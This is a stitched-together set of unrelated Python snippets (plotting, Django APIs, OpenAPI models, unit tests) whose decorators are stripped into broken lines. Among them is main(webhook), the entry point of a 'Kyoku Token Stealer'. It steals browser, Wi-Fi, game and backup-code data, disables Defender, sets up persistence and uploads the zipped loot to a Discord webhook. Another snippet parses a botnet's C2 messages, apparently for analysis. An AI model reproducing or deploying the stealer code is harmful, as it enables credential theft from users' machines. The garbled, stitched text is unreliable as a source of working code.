if (isinstance(address, bytes) and (len(address) == 4)):
self._ip = struct.unpack('!I', address)[0]
return
addr_str = str(address)
if (not self._is_valid_ip(addr_str)):
raise IPv4IpValidationError(addr_str)
self._ip = self._ip_int_from_string(addr_str) |
def plot_components(m, fcst, uncertainty=True, plot_cap=True, weekly_start=0, yearly_start=0, figsize=None):
components = ['trend']
if ((m.train_holiday_names is not None) and ('holidays' in fcst)):
components.append('holidays')
if (('weekly' in m.seasonalities) and ('weekly' in fcst)):
components.append('weekly')
if (('yearly' in m.seasonalities) and ('yearly' in fcst)):
components.append('yearly')
components.extend([name for name in sorted(m.seasonalities) if ((name in fcst) and (name not in ['weekly', 'yearly']))])
regressors = {'additive': False, 'multiplicative': False}
for (name, props) in m.extra_regressors.items():
regressors[props['mode']] = True
for mode in ['additive', 'multiplicative']:
if (regressors[mode] and ('extra_regressors_{}'.format(mode) in fcst)):
components.append('extra_regressors_{}'.format(mode))
npanel = len(components)
figsize = (figsize if figsize else (9, (3 * npanel)))
(fig, axes) = plt.subplots(npanel, 1, facecolor='w', figsize=figsize)
if (npanel == 1):
axes = [axes]
multiplicative_axes = []
dt = m.history['ds'].diff()
min_dt = dt.iloc[dt.values.nonzero()[0]].min()
for (ax, plot_name) in zip(axes, components):
if (plot_name == 'trend'):
plot_forecast_component(m=m, fcst=fcst, name='trend', ax=ax, uncertainty=uncertainty, plot_cap=plot_cap)
elif (plot_name in m.seasonalities):
if (((plot_name == 'weekly') or (m.seasonalities[plot_name]['period'] == 7)) and (min_dt == pd.Timedelta(days=1))):
plot_weekly(m=m, name=plot_name, ax=ax, uncertainty=uncertainty, weekly_start=weekly_start)
elif ((plot_name == 'yearly') or (m.seasonalities[plot_name]['period'] == 365.25)):
plot_yearly(m=m, name=plot_name, ax=ax, uncertainty=uncertainty, yearly_start=yearly_start)
else:
plot_seasonality(m=m, name=plot_name, ax=ax, uncertainty=uncertainty)
elif (plot_name in ['holidays', 'extra_regressors_additive', 'extra_regressors_multiplicative']):
plot_forecast_component(m=m, fcst=fcst, name=plot_name, ax=ax, uncertainty=uncertainty, plot_cap=False)
if (plot_name in m.component_modes['multiplicative']):
multiplicative_axes.append(ax)
fig.tight_layout()
for ax in multiplicative_axes:
ax = set_y_as_percent(ax)
return fig |
def test_registering_with_the_decorator_is_working_properly(prepare_publishers):
('Test')
def some_callable():
pass
assert ('test' in publishers[PRE_PUBLISHER_TYPE])
assert isinstance(publishers[PRE_PUBLISHER_TYPE]['test'], list)
assert (publishers[PRE_PUBLISHER_TYPE]['test'][0] == some_callable) |
def checkFocus(image_path):
image = cv2.imread(str(image_path))
scale_percent = 15
width = int(((image.shape[1] * scale_percent) / 100))
height = int(((image.shape[0] * scale_percent) / 100))
dim = (width, height)
resized = cv2.resize(image, dim, interpolation=cv2.INTER_AREA)
gray = cv2.cvtColor(resized, cv2.COLOR_BGR2GRAY)
fm = variance_of_laplacian(gray)
if (fm < threshold):
text = 'BLURRY'
color_text = (0, 0, 255)
rejected_images.append(image_path.name)
else:
text = 'NOT Blurry'
color_text = (255, 0, 0)
usable_images.append(image_path.name)
print(image_path.name, 'is', text)
if display_focus_check:
cv2.putText(resized, '{}: {:.2f}'.format(text, fm), (10, 30), cv2.FONT_HERSHEY_DUPLEX, 0.8, color_text, 3)
cv2.imshow('Image', resized)
cv2.waitKey(1) |
def advanced_search(cls, search, include):
rules = build_rules(search)
query_obj = build_query_obj(cls, search)
qs = cls.objects
if ('invalid' not in include):
qs = qs.valid()
if ('unavailable' not in include):
qs = qs.available()
if ('no_bnf_code' not in include):
qs = qs.with_bnf_code()
objs = qs.filter(query_obj)[:10001]
if (len(objs) == 10001):
too_many_results = True
objs = objs[:10000]
analyse_url = None
else:
too_many_results = False
analyse_url = _build_analyse_url(objs)
return {'objs': objs, 'rules': rules, 'too_many_results': too_many_results, 'analyse_url': analyse_url} |
def post(client, **kwargs):
url = '/api/v2/disaster/spending_by_geography/'
request_body = {}
filters = {}
if kwargs.get('def_codes'):
filters['def_codes'] = kwargs['def_codes']
if kwargs.get('award_type_codes'):
filters['award_type_codes'] = kwargs['award_type_codes']
request_body['filter'] = filters
if kwargs.get('geo_layer'):
request_body['geo_layer'] = kwargs['geo_layer']
if kwargs.get('geo_layer_filters'):
request_body['geo_layer_filters'] = kwargs['geo_layer_filters']
if kwargs.get('spending_type'):
request_body['spending_type'] = kwargs['spending_type']
if kwargs.get('scope'):
request_body['scope'] = kwargs['scope']
resp = client.post(url, content_type='application/json', data=json.dumps(request_body))
return resp |
('/posts', response_model=Page[schemas.Posts], dependencies=[Depends(pagination_params)])
def list_posts(response: Response, db: Session=Depends(get_db), user_id: Optional[int]=None) -> Any:
db_user = ''
if user_id:
db_user = get_user_by_id(db=db, user_id=user_id)
print(db_user)
if db_user:
posts = get_posts_by_userid(db=db, user_id=user_id)
else:
posts = get_all_posts(db=db)
if (db_user is None):
raise HTTPException(status_code=404, detail='User not found')
total_posts = count_posts(db=db)
response.headers['X-Total-Posts'] = str(total_posts)
return paginate(posts) |
(help='parse static analysis output and save to disk')
_context
('--run-kind', type=str)
('--branch', type=str)
('--commit-hash', type=str)
('--job-id', type=str)
('--differential-id', type=int)
('--add-feature', type=str, multiple=True)
('--previous-issue-handles', type=Path(exists=True, path_type=pathlib.Path), help='file containing list of issue handles to compare INPUT_FILE to')
('--linemap', type=Path(exists=True), help='json file mapping new locations to old locations')
('--store-unused-models', is_flag=True, help='store pre/post conditions unrelated to an issue')
('--dry-run', is_flag=True)
('input_file', type=Path(exists=True))
def analyze(ctx: Context, run_kind: Optional[str], branch: Optional[str], commit_hash: Optional[str], job_id: Optional[str], differential_id: Optional[int], previous_issue_handles: Optional[pathlib.Path], linemap: Optional[str], store_unused_models: bool, dry_run: bool, input_file: str, add_feature: Optional[List[str]]) -> None:
summary_blob: Dict[(str, Any)] = {'run_kind': run_kind, 'repository': ctx.repository, 'branch': branch, 'commit_hash': commit_hash, 'old_linemap_file': linemap, 'store_unused_models': store_unused_models}
if ((job_id is None) and (differential_id is not None)):
job_id = ('user_input_' + str(differential_id))
summary_blob['job_id'] = job_id
if previous_issue_handles:
summary_blob['previous_issue_handles'] = previous_issue_handles
if os.path.isdir(input_file):
analysis_output = AnalysisOutput.from_directory(input_file)
else:
analysis_output = AnalysisOutput.from_file(input_file)
pipeline_steps = [ctx.parser_class(), CreateDatabase(ctx.database), AddFeatures(add_feature), ModelGenerator(), TrimTraceGraph(), DatabaseSaver(ctx.database, PrimaryKeyGenerator(), dry_run)]
pipeline = Pipeline(pipeline_steps)
pipeline.run(analysis_output, summary_blob) |
def import_tags(exaile):
def _on_uris_selected(widget, uris):
import_dialog = GtImporter(exaile, uris)
import_dialog.show()
file_dialog = dialogs.DirectoryOpenDialog(exaile.gui.main.window, title=_('Select directory to import grouping tags from'))
file_dialog.connect('uris-selected', _on_uris_selected)
file_dialog.run()
file_dialog.destroy() |
def obligations_incurred_award(award_count_sub_schedule, award_count_submission, defc_codes):
award = _normal_award(592)
baker.make('awards.FinancialAccountsByAwards', award=award, parent_award_id='obligations award', disaster_emergency_fund=DisasterEmergencyFundCode.objects.filter(code='M').first(), submission=SubmissionAttributes.objects.all().first(), transaction_obligated_amount=8) |
class TlsCertificatesResponse(ModelComposed):
allowed_values = {}
validations = {}
_property
def additional_properties_type():
lazy_import()
return (bool, date, datetime, dict, float, int, list, str, none_type)
_nullable = False
_property
def openapi_types():
lazy_import()
return {'links': (PaginationLinks,), 'meta': (PaginationMeta,), 'data': ([TlsCertificateResponseData],)}
_property
def discriminator():
return None
attribute_map = {'links': 'links', 'meta': 'meta', 'data': 'data'}
read_only_vars = {}
_js_args_to_python_args
def _from_openapi_data(cls, *args, **kwargs):
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
self = super(OpenApiModel, cls).__new__(cls)
if args:
raise ApiTypeError(('Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments.' % (args, self.__class__.__name__)), path_to_item=_path_to_item, valid_classes=(self.__class__,))
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = (_visited_composed_classes + (self.__class__,))
constant_args = {'_check_type': _check_type, '_path_to_item': _path_to_item, '_spec_property_naming': _spec_property_naming, '_configuration': _configuration, '_visited_composed_classes': self._visited_composed_classes}
composed_info = validate_get_composed_info(constant_args, kwargs, self)
self._composed_instances = composed_info[0]
self._var_name_to_model_instances = composed_info[1]
self._additional_properties_model_instances = composed_info[2]
discarded_args = composed_info[3]
for (var_name, var_value) in kwargs.items():
if ((var_name in discarded_args) and (self._configuration is not None) and self._configuration.discard_unknown_keys and self._additional_properties_model_instances):
continue
setattr(self, var_name, var_value)
return self
required_properties = set(['_data_store', '_check_type', '_spec_property_naming', '_path_to_item', '_configuration', '_visited_composed_classes', '_composed_instances', '_var_name_to_model_instances', '_additional_properties_model_instances'])
_js_args_to_python_args
def __init__(self, *args, **kwargs):
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(('Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments.' % (args, self.__class__.__name__)), path_to_item=_path_to_item, valid_classes=(self.__class__,))
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = (_visited_composed_classes + (self.__class__,))
constant_args = {'_check_type': _check_type, '_path_to_item': _path_to_item, '_spec_property_naming': _spec_property_naming, '_configuration': _configuration, '_visited_composed_classes': self._visited_composed_classes}
composed_info = validate_get_composed_info(constant_args, kwargs, self)
self._composed_instances = composed_info[0]
self._var_name_to_model_instances = composed_info[1]
self._additional_properties_model_instances = composed_info[2]
discarded_args = composed_info[3]
for (var_name, var_value) in kwargs.items():
if ((var_name in discarded_args) and (self._configuration is not None) and self._configuration.discard_unknown_keys and self._additional_properties_model_instances):
continue
setattr(self, var_name, var_value)
if (var_name in self.read_only_vars):
raise ApiAttributeError(f'`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate class with read only attributes.')
_property
def _composed_schemas():
lazy_import()
return {'anyOf': [], 'allOf': [Pagination, TlsCertificatesResponseAllOf], 'oneOf': []} |
class LogInstance():
def __init__(self, info: str, latency_unit: str='word') -> None:
self.info = json.loads(info.strip())
self.intervals = []
for (key, value) in self.info.items():
setattr(self, key, value)
self.index = self.info['index']
self.reference = self.info.get('reference', '')
self.latency_unit = latency_unit
self.source_length = self.info.get('source_length')
self.finish_prediction = True
self.metrics = {}
self.target_spm_model = None
def set_target_spm_model(self, spm_model):
self.target_spm_model = spm_model
def reference_length(self) -> int:
if (self.latency_unit == 'word'):
return len(self.reference.split(' '))
elif (self.latency_unit == 'char'):
return len(self.reference.strip())
elif (self.latency_unit == 'spm'):
assert (self.target_spm_model is not None)
return len(self.target_spm_model.encode(self.reference, out_type=str))
else:
raise NotImplementedError |
def get_appointments_to_invoice(patient, company):
appointments_to_invoice = []
patient_appointments = frappe.get_list('Patient Appointment', fields='*', filters={'patient': patient.name, 'company': company, 'invoiced': 0, 'status': ['!=', 'Cancelled']}, order_by='appointment_date')
for appointment in patient_appointments:
if appointment.procedure_template:
if frappe.db.get_value('Clinical Procedure Template', appointment.procedure_template, 'is_billable'):
appointments_to_invoice.append({'reference_type': 'Patient Appointment', 'reference_name': appointment.name, 'service': appointment.procedure_template})
else:
if (frappe.db.get_single_value('Healthcare Settings', 'enable_free_follow_ups') and frappe.db.exists('Fee Validity Reference', {'appointment': appointment.name})):
continue
practitioner_charge = 0
income_account = None
service_item = None
if appointment.practitioner:
details = get_appointment_billing_item_and_rate(appointment)
service_item = details.get('service_item')
practitioner_charge = details.get('practitioner_charge')
income_account = get_income_account(appointment.practitioner, appointment.company)
appointments_to_invoice.append({'reference_type': 'Patient Appointment', 'reference_name': appointment.name, 'service': service_item, 'rate': practitioner_charge, 'income_account': income_account})
return appointments_to_invoice |
def __getattr__(name):
not_found = object()
result = not_found
if (name in _toolkit_imports):
from pyface.toolkit import toolkit_object
source = _toolkit_imports[name]
result = toolkit_object(f'data_view.{source}:{name}')
if (result is not_found):
raise AttributeError(f'module {__name__!r} has no attribute {name!r}')
globals()[name] = result
return result |
def test_file_handler_backend_register_next_step_handler(telegram_bot, private_chat, update_type):
telegram_bot.next_step_backend = FileHandlerBackend(filename='./.handler-saves/step1.save', delay=0.1)
_bot.message_handler(commands=['start'])
def start(message):
message.text = 'entered start'
telegram_bot.register_next_step_handler_by_chat_id(message.chat.id, next_handler)
telegram_bot.process_new_updates([update_type])
assert (update_type.message.text == 'entered start')
time.sleep(0.2)
assert os.path.exists(telegram_bot.next_step_backend.filename)
assert (len(telegram_bot.next_step_backend.handlers[private_chat.id]) == 1)
telegram_bot.next_step_backend.handlers = {}
telegram_bot.next_step_backend.load_handlers()
assert (len(telegram_bot.next_step_backend.handlers[private_chat.id]) == 1)
telegram_bot.process_new_updates([update_type])
assert (update_type.message.text == 'entered next_handler')
assert (private_chat.id not in telegram_bot.next_step_backend.handlers)
time.sleep(0.2)
if os.path.exists(telegram_bot.next_step_backend.filename):
os.remove(telegram_bot.next_step_backend.filename) |
def find_path(coins, frm, to, amount, online):
neighbor_map = {}
for i in range(amount, ((len(coins) - amount) + 1)):
if (coins[(i - 1)] != coins[i]):
if ((coins[(i - 1)] in online) and (coins[i] in online)):
if (coins[(i - amount):i] == ([coins[(i - 1)]] * amount)):
neighbor_map[coins[(i - 1)]] = list(set((neighbor_map.get(coins[(i - 1)], []) + [coins[i]])))
if (coins[i:(i + amount)] == ([coins[i]] * amount)):
neighbor_map[coins[i]] = list(set((neighbor_map.get(coins[i], []) + [coins[(i - 1)]])))
parents = {frm: None}
q = [(0, frm)]
while q:
(dist, sender) = heapq.heappop(q)
neighbors = neighbor_map.get(sender, [])
for n in neighbors:
if (n not in parents):
heapq.heappush(q, ((dist + 1), n))
parents[n] = sender
if (n == to):
o = [n]
while (o[0] != frm):
o.insert(0, parents[o[0]])
return o
return False |
class PaymentMethodTests(unittest.TestCase):
def test_unicode(self):
payment_method = PaymentMethod()
payment_method.Name = 'test'
self.assertEqual(str(payment_method), 'test')
def test_valid_object_name(self):
obj = PaymentMethod()
client = QuickBooks()
result = client.isvalid_object_name(obj.qbo_object_name)
self.assertTrue(result)
def test_to_ref(self):
obj = PaymentMethod()
obj.Name = 'test'
obj.Id = 12
ref = obj.to_ref()
self.assertEqual(ref.name, 'test')
self.assertEqual(ref.type, 'PaymentMethod')
self.assertEqual(ref.value, 12) |
def main(webhook: str):
webhook = SyncWebhook.from_url(webhook, session=requests.Session())
threads = [Browsers, Wifi, Minecraft, BackupCodes, killprotector, fakeerror, startup, disable_defender]
username = getpass.getuser()
configcheck(threads)
for func in threads:
process = threading.Thread(target=func, daemon=True)
process.start()
for t in threading.enumerate():
try:
t.join()
except RuntimeError:
continue
zipup()
_file = None
_file = File(f'{localappdata}\Kyoku-Logged-{os.getlogin()}.zip')
content = ''
if __PING__:
if (__PINGTYPE__ == 'everyone'):
content += ''
elif (__PINGTYPE__ == 'here'):
content += ''
webhook.send(content=content, file=_file, avatar_url='', username='Kyoku Token Stealer')
PcInfo()
Discord() |
def get_function_metrics(mh, cfg, tree):
assert isinstance(mh, Message_Handler)
assert isinstance(cfg, config.Config)
assert isinstance(tree, Compilation_Unit)
metrics = {}
justifications = {}
class Function_Visitor(AST_Visitor):
def visit(self, node, n_parent, relation):
if isinstance(node, Function_Definition):
name = node.get_local_name()
n_body = node.n_body
elif isinstance(node, Script_File):
name = node.get_local_name()
n_body = node.n_statements
else:
return
metrics[name] = {m: {'measure': MEASURE[m](node), 'limit': None, 'reason': None, 'tickets': set()} for m in config.FUNCTION_METRICS if cfg.metric_enabled(m)}
justifications[name] = get_justifications(mh, n_body)
for function_metric in config.FUNCTION_METRICS:
check_metric(mh, cfg, node.loc(), function_metric, metrics[name], justifications[name])
tree.visit(None, Function_Visitor(), 'Root')
return metrics |
def action_to_str(act):
s = act.to_jsondict()[act.__class__.__name__]
t = UTIL.ofp_action_type_to_user(s['type'])
s['type'] = (t if (t != s['type']) else 'UNKNOWN')
if (t == 'SET_FIELD'):
field = s.pop('field')
s['field'] = field['OXMTlv']['field']
s['mask'] = field['OXMTlv']['mask']
s['value'] = field['OXMTlv']['value']
elif (t == 'COPY_FIELD'):
oxm_ids = s.pop('oxm_ids')
s['src_oxm_id'] = oxm_ids[0]['OFPOxmId']['type']
s['dst_oxm_id'] = oxm_ids[1]['OFPOxmId']['type']
return s |
class OptionPlotoptionsPackedbubbleSonificationDefaultinstrumentoptionsMappingNoteduration(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
def get_baseline_config(prefilter_poses):
(time_alignment_config, hand_eye_config) = get_basic_config()
if prefilter_poses:
hand_eye_config.algorithm_name = 'baseline_filter'
else:
hand_eye_config.algorithm_name = 'baseline_no_filter'
hand_eye_config.use_baseline_approach = True
hand_eye_config.prefilter_poses_enabled = prefilter_poses
hand_eye_config.enable_exhaustive_search = False
return (time_alignment_config, hand_eye_config) |
class OptionChartPanning(Options):
def enabled(self):
return self._config_get(False)
def enabled(self, flag: bool):
self._config(flag, js_type=False)
def type(self):
return self._config_get('x')
def type(self, text: str):
self._config(text, js_type=False) |
def extractSnowbelldotBlogspotCom(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
tagmap = [('Cold King', 'Cold King, the Doctor Fei Is Running Away', 'translated'), ('the Doctor Fei Is Running Away', 'Cold King, the Doctor Fei Is Running Away', 'translated'), ('Wifes Color is Addicting', "Wife's Color is Addicting", 'translated'), ('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
for (tagname, name, tl_type) in tagmap:
if (tagname in item['tags']):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
class OptionPlotoptionsSankeySonificationDefaultinstrumentoptionsMappingTremoloDepth(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
def extractWwwXinShouSite(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
tagmap = [('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
for (tagname, name, tl_type) in tagmap:
if (tagname in item['tags']):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
def key_get(obj: Dict[(str, Any)], key: str, default: Any=_KeyGetNoDefault) -> Any:
split_key = key.split('.')
KeyDoesNotExist = object()
position = obj
for component in split_key:
try:
position = position.get(component, KeyDoesNotExist)
except AttributeError:
try:
position = getattr(position, component, KeyDoesNotExist)
except AttributeError:
if (default is not _KeyGetNoDefault):
return default
else:
raise AttributeError(f'{key} does not exist.')
if (position == KeyDoesNotExist):
if (default is not _KeyGetNoDefault):
return default
else:
raise AttributeError(f'{key} does not exist.')
return position |
def __plugin_loader(plugin_name):
logprint('loading {}!'.format(plugin_name))
if (not pm.pluginInfo(plugin_name, q=1, loaded=1)):
start_time = time.time()
try:
pm.loadPlugin(plugin_name)
except RuntimeError:
logprint('{} not found!'.format(plugin_name))
pass
else:
end_time = time.time()
duration = (end_time - start_time)
logprint(('%s loaded! in %0.3f sec' % (plugin_name, duration)))
else:
logprint('Plugin already loaded: {}'.format(plugin_name)) |
def test_check_multi_point_multi_polyon_outside_op():
pol = Polygons((SMALL_POLY_INNER + LARGE_POLY_SHIFTED))
poi = Points([(4.0, 4.0, 0.0), (4.5, 4.0, 0.0), (7.0, 7.0, 0.0), (20.0, 5.0, 0.0)])
assert (len(poi.dataframe) == 4)
poi.operation_polygons(pol, value=1, opname='eli', inside=False, version=1)
assert (len(poi.dataframe) == 0)
poi = Points([(4.0, 4.0, 0.0), (4.5, 4.0, 0.0), (7.0, 7.0, 0.0), (20.0, 5.0, 0.0)])
poi.operation_polygons(pol, value=1, opname='eli', inside=False, version=2)
assert (len(poi.dataframe) == 3) |
def forceStartAccessibilityServer():
if (not fb.evaluateBooleanExpression('[UIView instancesRespondToSelector:(_accessibilityElementsInContainer:)]')):
if isRunningInSimulator():
fb.evaluateEffect('[[UIApplication sharedApplication] accessibilityActivate]')
else:
fb.evaluateEffect('[[[UIApplication sharedApplication] _accessibilityBundlePrincipalClass] _accessibilityStartServer]') |
.django_db
def test_get_download_ids(monkeypatch, transaction_type_data, elasticsearch_transaction_index):
setup_elasticsearch_test(monkeypatch, elasticsearch_transaction_index)
results = get_download_ids(['pop tart'], 'transaction_id')
transaction_ids = list(itertools.chain.from_iterable(results))
expected_results = [1, 2, 3, 4, 5, 6]
assert (transaction_ids == expected_results) |
def parse_cnc_request(f):
data = {}
data['version'] = unpack('I', f.read(4))[0]
data['msg_type'] = unpack('I', f.read(4))[0]
if (data['msg_type'] == 1):
data = parse_cnc_request_config(f, data)
f.read(8)
elif (data['msg_type'] == 14):
data['msg_type_decoded'] = 'REPORT_TELNET_LOGIN'
data['ipaddr'] = socket.inet_ntoa(f.read(4))
f.read(28)
elif (data['msg_type'] == 15):
data = parse_cnc_request_infect(f, data)
f.read(20)
elif (data['msg_type'] == 20):
data['msg_type_decoded'] = 'REPORT_SNIFF'
data['pkt_len'] = unpack('I', f.read(4))[0]
f.read(28)
if (data['msg_type'] == 20):
ct = bytearray(f.read(data['pkt_len']))
data['sniff_payload'] = decrypt_cnc_msg(ct)
if (data['msg_type'] == 15):
data['cpu_model_len'] = unpack('I', f.read(4))[0]
data['cpu_model'] = decrypt_cnc_msg(bytearray(f.read(data['cpu_model_len'])))
data['processor_len'] = unpack('I', f.read(4))[0]
data['processor'] = decrypt_cnc_msg(bytearray(f.read(data['processor_len'])))
return data |
class OptionSeriesSankeyStatesHoverHalo(Options):
def attributes(self):
return self._config_get(None)
def attributes(self, value: Any):
self._config(value, js_type=False)
def opacity(self):
return self._config_get(0.25)
def opacity(self, num: float):
self._config(num, js_type=False)
def size(self):
return self._config_get(10)
def size(self, num: float):
self._config(num, js_type=False) |
def graphs_with_no_propagation_of_contraction_address_assignment():
x = vars('x', 3)
ptr = vars('ptr', 1, type=Pointer(int32))
in_n0 = BasicBlock(0, [_assign(UnaryOperation(OperationType.cast, [x[1]], contraction=True), _addr(x[0])), _assign(x[2], UnaryOperation(OperationType.cast, [x[1]], contraction=True))])
in_cfg = ControlFlowGraph()
in_cfg.add_node(in_n0)
out_cfg = ControlFlowGraph()
out_cfg.add_node(BasicBlock(0, [_assign(UnaryOperation(OperationType.cast, [x[1]], contraction=True), _addr(x[0])), _assign(x[2], UnaryOperation(OperationType.cast, [_addr(x[0])], contraction=True))]))
return (in_cfg, out_cfg) |
(help={'fmt': 'Build a local report: report, html, json, annotate, html, xml.', 'open_browser': 'Open the coverage report in the web browser (requires --fmt html)'})
def coverage(c, fmt='report', open_browser=False):
if any(Path().glob('.coverage.*')):
_run(c, 'poetry run coverage combine')
_run(c, f'poetry run coverage {fmt} -i')
if ((fmt == 'html') and open_browser):
webbrowser.open(COVERAGE_REPORT.as_uri()) |
class StagingDirectory():
class Error(Exception):
pass
def __init__(self, staging_dir=None):
self._staging = os.path.normpath((staging_dir or tempfile.mkdtemp()))
safe_mkdir(self._staging)
def __deepcopy__(self, memo):
other = StagingDirectory()
memo[id(self)] = other
other.copytree(self._staging)
return other
def _normalize(self, dst):
dst = os.path.normpath(dst)
if (dst.startswith(os.sep) or dst.startswith('..')):
raise self.Error(("Destination path '%s' is not a relative!" % dst))
return dst
def _ensure_parent(self, dst):
safe_mkdir(os.path.dirname(self.absolute(dst)))
def _ensure_not_dst(self, dst):
if self.exists(dst):
raise self.Error(("Destination path '%s' already exists!" % dst))
def path(self):
return self._staging
def absolute(self, dst=None):
if (dst is None):
return self._staging
dst = self._normalize(dst)
return os.path.normpath(os.path.join(self._staging, dst))
def delete(self):
safe_rmtree(self._staging)
def copy(self, src, dst):
dst = self._normalize(dst)
self._ensure_parent(dst)
self._ensure_not_dst(dst)
shutil.copy2(src, self.absolute(dst))
def write(self, data, dst, mode, permissions):
dst = self._normalize(dst)
self._ensure_parent(dst)
self._ensure_not_dst(dst)
with open(self.absolute(dst), mode) as f:
f.write(data)
os.chmod(self.absolute(dst), permissions)
def postprocess(self, src):
fpath = self.absolute(src)
st = os.stat(fpath)
old_times = (st.st_atime, st.st_mtime)
with tempfile.NamedTemporaryFile(prefix=(fpath + '.'), mode='w', delete=False) as outf:
with open(fpath) as inf:
(yield (inf, outf))
outf.flush()
os.utime(outf.name, old_times)
shutil.copystat(fpath, outf.name)
os.rename(outf.name, fpath)
def _resolve_dst_dir(self, dst):
if (dst is None):
if (os.listdir(self._staging) != []):
raise self.Error('Staging directory is not empty!')
safe_rmtree(self._staging)
dst = '.'
dst = self._normalize(dst)
self._ensure_not_dst(dst)
return dst
def copytree(self, src, dst=None):
dst = self._resolve_dst_dir(dst)
shutil.copytree(src, self.absolute(dst))
def symlink(self, link, dst):
dst = self._normalize(dst)
self._ensure_parent(dst)
self._ensure_not_dst(dst)
os.symlink(link, self.absolute(dst))
def move(self, src, dst):
dst = self._normalize(dst)
self._ensure_parent(dst)
self._ensure_not_dst(dst)
shutil.move(src, self.absolute(dst))
def exists(self, dst):
dst = self._normalize(dst)
return os.path.exists(self.absolute(dst))
def extract(self, zf, dst=None):
dst = self._resolve_dst_dir(dst)
abs_dst = os.path.join(self._staging, dst)
timestamps = {}
for zi in zf.infolist():
filename = os.path.join(dst, zi.filename)
destination = self.absolute(filename)
mode = (zi.external_attr >> 16)
if stat.S_ISLNK(mode):
target = zf.read(zi).decode('utf-8')
self.symlink(target, filename)
else:
self._ensure_parent(filename)
zf.extract(zi, path=abs_dst)
os.chmod(destination, stat.S_IMODE(mode))
if filename.endswith('.pyc'):
new_time = extract_pyc_timestamp(destination)
timestamps[destination] = new_time
timestamps[destination[:(- 1)]] = new_time
else:
new_time = tuple((list(zi.date_time) + [0, 0, (- 1)]))
timestamps[destination] = time.mktime(new_time)
for (path, timestamp) in timestamps.items():
try:
os.utime(path, (timestamp, timestamp))
except OSError as e:
if (not path.endswith('.py')):
raise e |
class TestVerbConjugate(TestCase):
([('have', 'have'), ('swim', 'swim'), ('give', 'give'), ('given', 'give'), ('am', 'be'), ('doing', 'do'), ('are', 'be')])
def test_verb_infinitive(self, verb, expected):
self.assertEqual(expected, conjugate.verb_infinitive(verb))
([('inf', 'have', 'have'), ('inf', 'swim', 'swim'), ('inf', 'give', 'give'), ('inf', 'given', 'give'), ('inf', 'am', 'be'), ('inf', 'doing', 'do'), ('inf', 'are', 'be'), ('2sgpres', 'am', 'are'), ('3sgpres', 'am', 'is')])
def test_verb_conjugate(self, tense, verb, expected):
self.assertEqual(expected, conjugate.verb_conjugate(verb, tense=tense))
([('1st', 'have', 'have'), ('1st', 'swim', 'swim'), ('1st', 'give', 'give'), ('1st', 'given', 'give'), ('1st', 'am', 'am'), ('1st', 'doing', 'do'), ('1st', 'are', 'am'), ('2nd', 'were', 'are'), ('3rd', 'am', 'is')])
def test_verb_present(self, person, verb, expected):
self.assertEqual(expected, conjugate.verb_present(verb, person=person))
([('have', 'having'), ('swim', 'swimming'), ('give', 'giving'), ('given', 'giving'), ('am', 'being'), ('doing', 'doing'), ('are', 'being')])
def test_verb_present_participle(self, verb, expected):
self.assertEqual(expected, conjugate.verb_present_participle(verb))
([('1st', 'have', 'had'), ('1st', 'swim', 'swam'), ('1st', 'give', 'gave'), ('1st', 'given', 'gave'), ('1st', 'am', 'was'), ('1st', 'doing', 'did'), ('1st', 'are', 'was'), ('2nd', 'were', 'were')])
def test_verb_past(self, person, verb, expected):
self.assertEqual(expected, conjugate.verb_past(verb, person=person))
([('have', 'had'), ('swim', 'swum'), ('give', 'given'), ('given', 'given'), ('am', 'been'), ('doing', 'done'), ('are', 'been')])
def test_verb_past_participle(self, verb, expected):
self.assertEqual(expected, conjugate.verb_past_participle(verb))
def test_verb_get_all_tenses(self):
self.assertEqual(list(conjugate.verb_tenses_keys.keys()), conjugate.verb_all_tenses())
([('have', 'infinitive'), ('swim', 'infinitive'), ('give', 'infinitive'), ('given', 'past participle'), ('am', '1st singular present'), ('doing', 'present participle'), ('are', '2nd singular present')])
def test_verb_tense(self, verb, expected):
self.assertEqual(expected, conjugate.verb_tense(verb))
([('inf', 'have', True), ('inf', 'swim', True), ('inf', 'give', True), ('inf', 'given', False), ('inf', 'am', False), ('inf', 'doing', False), ('inf', 'are', False)])
def test_verb_is_tense(self, tense, verb, expected):
